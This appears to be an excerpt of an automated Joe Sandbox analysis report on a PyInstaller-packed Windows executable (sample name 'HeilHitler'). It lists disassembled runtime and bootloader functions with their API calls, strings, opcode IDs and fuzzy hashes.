                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                            • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                            • Instruction ID: 82e56ad8a0df23da2c5ca72204515ecf9651ba7de6e1197dacfbe79d7a3fddff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4318772619A8185EB20DFA1E8562F97360FF88788F840235EA4DDBB59DF3CD145D700
                                                                                                                                                                                                                                            Function 00007FF633D62B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF633D6918F,?,00007FF633D63C55), ref: 00007FF633D62BA0
                                                                                                                                                                                                                                            • MessageBoxW.USER32 ref: 00007FF633D62C2A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                            • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                            • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                            • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                            • Instruction ID: f9e216a77434f41ddc6c2818c5590be12bae5bfbd5c22c3e413d37561858f23e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2221F732708B4192E7119B94F8467EA73A4FB88784F805236EE8DA7756DF3CD215C740
                                                                                                                                                                                                                                            Function 00007FF633D62710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF633D61B99), ref: 00007FF633D62760
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                            • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                            • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                            • Instruction ID: 2ac7761fc5d2d0ce4d1714a694a1c284d2a48211121f43196110f73418939675
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1821B232A19B8192E720DB91F8427E673A4FB88784F801235FE9DA3759DF3CE1459740
                                                                                                                                                                                                                                            Function 00007FF633D79A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                            • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                            • Instruction ID: 6e70702f8cc8c05fd7e2224f32638cf4824501ea2af2367d430ac242eaca4e9f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CF04F21B0A70681EA108FA4E49677A6320BF45761F541339D67E9A7E4DF3CE048E740
                                                                                                                                                                                                                                            Function 00007FF633D89368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                                                            • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                            • Instruction ID: 1740fa7dea82f0db993d721bdbc789fe3a290f01ab4c766d09565ea55d8dcb9a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A114F22E5CA0302FA6512EAE4973791150EF59364E046734EAEFFE7DA8E7CB8416104
                                                                                                                                                                                                                                            Function 00007FF633D7B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B3AF
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B3CE
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B3F6
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B407
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B418
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                                            • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                            • Instruction ID: ca50551e65363582523f6374fa265e7449db3506ccfaf416f793eb32d8966603
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9115E20F0C64281FA689FB5955367962465F447B4F888334E93EFB7D6DE2CE452A300
                                                                                                                                                                                                                                            Function 00007FF633D7B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                                            • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                            • Instruction ID: 6eab562e1d83f5d882c4aa02a22574ba7fae9327a1151a8ca1ce9ebb4e4ec727
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38113920E0E20781FAA86EF1442367E12424F45370F084734D93EFA7D2DD2CB9507341
                                                                                                                                                                                                                                            Function 00007FF633D75FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: verbose
                                                                                                                                                                                                                                            • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                            • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                            • Instruction ID: 5bfbfe9ee72169a339b73ff0211cb6058e7213603982fe5c203b5fe916921353
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8291F232A08A4685F7658EA4D45637D37A1AB40B94F844336DE9DE33D6FF3CE849A300
                                                                                                                                                                                                                                            Function 00007FF633D7FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                            • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                            • Instruction ID: 6d0f7454b8fec6c00dd6cf00228ac33d822e6e7074f624caf0611361992f1dec
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0881CD72E0821385F7749EA9815227826A8EB11B48F558735DA2DFF389CF2DE941B702
                                                                                                                                                                                                                                            Function 00007FF633D6D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                            • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                            • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                            • Instruction ID: 61be1db25d527b0826e63ee315ab3468e3c2d08d298a55817cdb556ed082ef50
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F51BF32B196428ADB14CF95F445A787391FB44B98F918230DA6EA779CEF7CE841D700
                                                                                                                                                                                                                                            Function 00007FF633D6F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                            • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                            • Instruction ID: 3fcdcd1c0f0ea58bf7fcc9dfd958138af5f85b08eccddb40698e0f4ea41e857b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B651A332A08B428AEB748FA1D14526837A8FB54B84F945336DA6DABB95CF3CF450D701
                                                                                                                                                                                                                                            Function 00007FF633D6EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                            • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                            • Instruction ID: 8358b9b083ad9bcf205d14673147ecac64c4f19881dc2d13d781748a40487605
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0061A232908BC586DB208F65E4413AAB7A4FB947C4F444325EBAC57B99DF7CE194CB00
                                                                                                                                                                                                                                            Function 00007FF633D67E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,?,00007FF633D6352C,?,00000000,00007FF633D63F1B), ref: 00007FF633D67F32
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateDirectory
                                                                                                                                                                                                                                            • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                            • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                            • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                            • Instruction ID: 1bc1189d81329e79b0f594df65f4b7a7ddf4bfb33ccbd971c0db40d7ffe78eff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B031E621619AC645FA219B61E8127AA7358EF84BE4F800331FE7D977C9EF3CD6059700
                                                                                                                                                                                                                                            Function 00007FF633D62810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                            • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                            • API String ID: 2030045667-255084403
